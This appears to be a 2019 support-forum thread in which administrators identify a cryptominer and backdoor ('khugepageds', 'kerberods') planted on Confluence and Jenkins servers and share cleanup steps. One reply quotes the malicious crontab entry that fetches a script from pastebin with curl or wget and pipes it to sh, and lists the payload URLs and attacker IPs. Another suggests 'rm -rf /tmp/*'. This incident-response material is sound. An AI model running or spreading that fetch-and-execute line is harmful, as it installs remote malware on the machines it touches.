khugepageds eating all of the CPU

dovi5988
Contributor
April 11, 2019

Hi,


We have had Confluence hosted on our own box for a few years now with no issues. Confluence runs under its own user. Yesterday, out of nowhere, a process named khugepageds showed up using 600% of the CPU (the box has 8 CPUs in total; the rest are being used by Java). I stopped Confluence, but the process lives on. When I look at the processes I see:

501 9063 625 0.0 144936 13700 ? Ssl Apr10 9422:08 /tmp/khugepageds =/tmp/kerberods TERM=linux JRE_HOME=/opt/atlassian/confluence/jre/ NLSPATH=/usr/dt/lib/nls/msg/%L/%N.cat PATH=/sbin:/usr/sbin:/bin:/usr/bin:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin RUNLEVEL=3 runlevel=3 PWD=/opt/atlassian/confluence/bin LANGSH_SOURCED=1 LANG=en_US.UTF-8 PREVLEVEL=N previous=N XFILESEARCHPATH=/usr/dt/app-defaults/%L/Dt CATALINA_OPTS= -Xms1280m -Xmx1280m -XX:MaxPermSize=384m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2017-11-21_01-34-45.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution CONF_USER=confluence CONSOLETYPE=serial SHLVL=7 HOME= CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid UPSTART_INSTANCE= UPSTART_EVENTS=runlevel UPSTART_JOB=rc _=/tmp/kerberods __DAEMON_FD_3=2f746d702f2e583131756e6978: __DAEMON_STAGE=

 

The log file was last written to on 2019-02-22. Since the process stayed up after I stopped Confluence, is it safe to kill? I don't want to kill a process that could break my Confluence setup.

 

 

58 answers

4 votes
Johannes Schurer
I'm New Here
April 11, 2019

It's a virus. khugepageds is an obfuscated crypto miner, and there is a second process, kerberods, that is a backdoor and uses SSH to open reverse tunnels.

It's triggered from the crontab of the user Confluence is running under.

Stop and disable cron. Kill both processes. Update.

3 votes
Jeff Turner April 16, 2019

As a consultant, I cleaned up a client's hacked Confluence on Monday, and wrote up the experience:

What to do when your Confluence is hacked

Feedback welcome.

1 vote
Jeff Turner
Rising Star
April 25, 2019

According to this alertlogic.com blog, this vulnerability is also being exploited to launch ransomware.

1 vote
Zoran Pucar April 19, 2019

One problem is that the cron job can be hard to trace, depending on which user Confluence runs as.

Fortunately, the exploit doesn't do privilege escalation and can only run as the confluence user. Too bad if you are running Confluence as root.

Since the exploit can work differently depending on distro and user, one way to remove "the teeth" from the cron job while you search for it is to block access to pastebin.com. That way, even if you leave the cron job running, it won't work. Note that the rules below are for IPv4 only; pastebin.com has AAAA records, so if you are using IPv6 make sure you add matching rules too. The method is only for reference and won't persist if you reboot the server.

[root@iowerwatch ~]# host pastebin.com

pastebin.com has address 104.20.209.21

pastebin.com has address 104.20.208.21

...

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.209.21/32 -j REJECT --reject-with icmp-port-unreachable

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.208.21/32 -j REJECT --reject-with icmp-port-unreachable
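The rules above can be generated for every resolved address, IPv6 included. This is only a minimal sketch: it assumes `host` prints lines of the form "has address" / "has IPv6 address", and the function name `block_rules_from_host` is made up for illustration. It prints the commands rather than running them, so they can be reviewed first.

```shell
# Hypothetical helper: read `host` output on stdin and print one
# iptables/ip6tables REJECT rule per resolved address.
# Nothing is executed; the rules are only printed for review.
block_rules_from_host() {
    awk '
        / has address /      { print "iptables -A OUTPUT -d " $NF "/32 -j REJECT" }
        / has IPv6 address / { print "ip6tables -A OUTPUT -d " $NF "/128 -j REJECT" }
    '
}

# Usage (review the output, then run the printed commands as root):
#   host pastebin.com | block_rules_from_host
```

As with the manual rules, anything added this way is lost on reboot, and the addresses can change whenever the DNS records do.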

1 vote
abhijitsharma806 April 19, 2019

Hi All

I have faced the same kind of issue on my Jenkins server.

/tmp/khugepageds uses 200% CPU on my AWS t2.medium instance.

I have taken some steps. Please follow them; they may help you.

1 - Using top/htop, find the PID of /tmp/khugepageds (the lowest PID is most likely the parent).

2 - Run lsof against that PID, for example: # lsof -p 1919

3 - The output shows the IP the process is connected to.

4 - Go to your firewall rules and block that IP, both inbound and outbound.

5 - Check
cat /var/spool/cron/crontabs/jenkins to see whether any crontab entries are present.

6 - I traced that IP's location: it is in the United States and the ISP is DigitalOcean LLC.
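Steps 1 to 3 can be sketched as a small script. This is a rough illustration, not a definitive procedure: it assumes a Linux /proc filesystem, and the function name `find_tmp_procs` is made up here. It lists every process whose executable lives under /tmp, which is where the malware in this thread was running from.

```shell
# Hypothetical helper: print "PID PATH" for every process whose executable
# lives under /tmp. The optional argument (default /proc) exists only so
# the function can be pointed at a different directory for testing.
find_tmp_procs() {
    proc_root="${1:-/proc}"
    for exe in "$proc_root"/[0-9]*/exe; do
        # Skip entries we cannot read (other users' processes, kernel threads).
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            /tmp/*)
                pid=${exe%/exe}
                echo "${pid##*/} $target"
                ;;
        esac
    done
}

# Usage (as root, so every process's exe link is readable):
#   find_tmp_procs
#   lsof -a -n -P -i -p 1919   # network connections only, for the example PID
```

A binary that was deleted after launch shows up with " (deleted)" appended to its path, which is itself worth a closer look.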

[5 screenshots attached]

1 vote
David Yu
Rising Star
April 18, 2019

Hope everyone was able to clean their systems up. I'm subscribed to all Tech Alerts to stay on top of security vulnerabilities, but in this case Atlassian did not e-mail me; a colleague notified me instead.

I reached out to their support and they fixed a bug in their mailer, so it's a good time to check your email notification preferences at https://my.atlassian.com and make sure you're listed as a Technical Contact for your product.

1 vote
llondono
I'm New Here
April 17, 2019

Was anyone able to find out how the attackers got the crontab entry added? Was it because they gained access through the specified add-ons, and those had permission to modify the crontab?

1 vote
Andrea C
Contributor
April 16, 2019

I deleted the cron entry and it hasn't reappeared.

1 vote
Deleted user April 15, 2019

Hi Robert,

I can't speak for your installation, but I can tell you what I did to mitigate on our system (in lieu of Atlassian's disappointing technical support...if I knew about the support bait and switch that would happen I would have heavily lobbied to not go this direction a few years ago).

Anyway: log into the console and kill the kerberods and khugepageds processes by finding their process IDs and killing them with sudo (hopefully you are not running Confluence as the root user).

pidof khugepageds
12345 <-- for example
sudo kill 12345

pidof kerberods
67890 <-- for example
sudo kill 67890

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).
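Before editing the file by hand, it can help to have the suspicious entries picked out. A minimal sketch, assuming the malicious entries look like the ones reported in this thread (a curl or wget download piped straight into a shell); the function name `flag_cron_downloaders` is made up for illustration, and other malware may use a different pattern entirely.

```shell
# Hypothetical helper: read crontab text on stdin and print, with line
# numbers, every non-comment entry that pipes a curl or wget download
# into sh or bash. Exits non-zero when nothing matches (grep's behaviour).
flag_cron_downloaders() {
    grep -nE '^[^#]*(curl|wget)[^#]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Usage:
#   sudo crontab -l -u confluence | flag_cron_downloaders
```

An empty result only means this one pattern was not found, so the crontab is still worth reading in full.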

I then followed Atlassian's guide to mitigate by manually disabling the WebDAV and Widget Connector plugins.

There has been no further evidence of malicious activity.

We were fortunate that we run this on an Amazon M4 and not on a T instance, as this would have eaten up the CPU credits pretty quickly and removed our ability to even log into the console (or run up a bill in unlimited mode, which really could have sucked).

As soon as I can find an opportunity I am going to upgrade (can I just say major version upgrades are a pain).

1 vote
eleven12 April 11, 2019

Thank you Nick Smith! I noticed that the khugepageds was starting every 10 minutes and your note reminded me to check the user confluence's crontab entries. Sure enough, there was a suspicious entry that started every 10 minutes. I deleted it and the problem appears to have disappeared. I also upgraded to the latest version of Confluence.

0 votes
bluelight April 25, 2019

dd.heheda.tk resolves @ Cloudflare https://db-ip.com/104.18.59.79

I opened a support ticket https://support.cloudflare.com/hc/requests/1677155

Thanks

0 votes
Zoran Pucar April 20, 2019

Roo, the bug allows remote code execution! This means an attacker can execute any command as the confluence user on the system running it, including adding crontab entries.

0 votes
Roo
I'm New Here
April 19, 2019

@dovi5988 I think llondono was asking how the crontab entry was added. I am trying to figure this out too. Can anyone chip in?

0 votes
abhijitsharma806 April 19, 2019

I found one more cron entry for the Jenkins user, and deleted that too.

[1 screenshot attached]

0 votes
abhijitsharma806 April 19, 2019

Hi @dovi5988 

The file /var/spool/cron/crontabs/jenkins contains some URLs; if you open them you will find some scripts.

https://pastebin.com/raw/wR3ETdbi
https://pastebin.com/raw/Zk7Jv9j2
https://pastebin.com/raw/0Sxacvsh

 

Please see the screenshots as well. The IPs are mentioned inside the script.

There are 2 IPs. Hope this helps.

119.9.106.27 and
104.130.210.206

[3 screenshots attached]

0 votes
abhijitsharma806 April 19, 2019

8 - Please try to clean out the /tmp folder (# rm -rf /tmp/*).

Thank you @dovi5988. If possible, could you please check the attached screenshot? I SSHed into my Jenkins server and ran lsof, and my home public IPs are different.

If it is my phone/home IP, then why is the /tmp/khugepageds process trying to reach it, and why can it no longer make contact after I blocked it at the AWS NACL level?

0 votes
Dovid Bender
Contributor
April 19, 2019

The DigitalOcean IP seems to be the phone-home IP (the address the malware reports back to). The other IPs you see are the malware attacking other hosts in the same /16 as you. It's trying to get your host to attack others.

0 votes
abhijitsharma806 April 19, 2019

Try to remove the cron file. For me the location is /var/spool/cron/crontabs/jenkins

*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

7 - I blocked the IP in the AWS VPC NACL, and after that CPU usage dropped. If possible, restart the Jenkins services.

This may help you guys.

 

[3 screenshots attached]

0 votes
Dovid Bender
Contributor
April 17, 2019

They ran the curl command, which called the bash script (via pastebin), which fetches kerberods, which in turn creates the cron job.

0 votes
Brian Hill
Contributor
April 17, 2019

Excellent write-up @Jeff Turner - thx for taking the extra time to document intervention steps for the benefit of others.

0 votes
Dovid Bender
Contributor
April 17, 2019

FYI: Another advisory was released. Time to upgrade again. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

0 votes
Zoran Pucar April 16, 2019

Your settings are not working because the load is not coming from the kernel's khugepaged but from a different binary named khugepageds, chosen to "hide" on your system. It is malicious software.

As stated earlier in this thread, there are ways to disable it.

0 votes
Dovid Bender
Contributor
April 16, 2019

Feel free to email me at: dovi5988 -- gmail.com

0 votes
warthog April 16, 2019

I had set it up to run as the confluence user. I'm looking into it now; I changed my root password just in case.
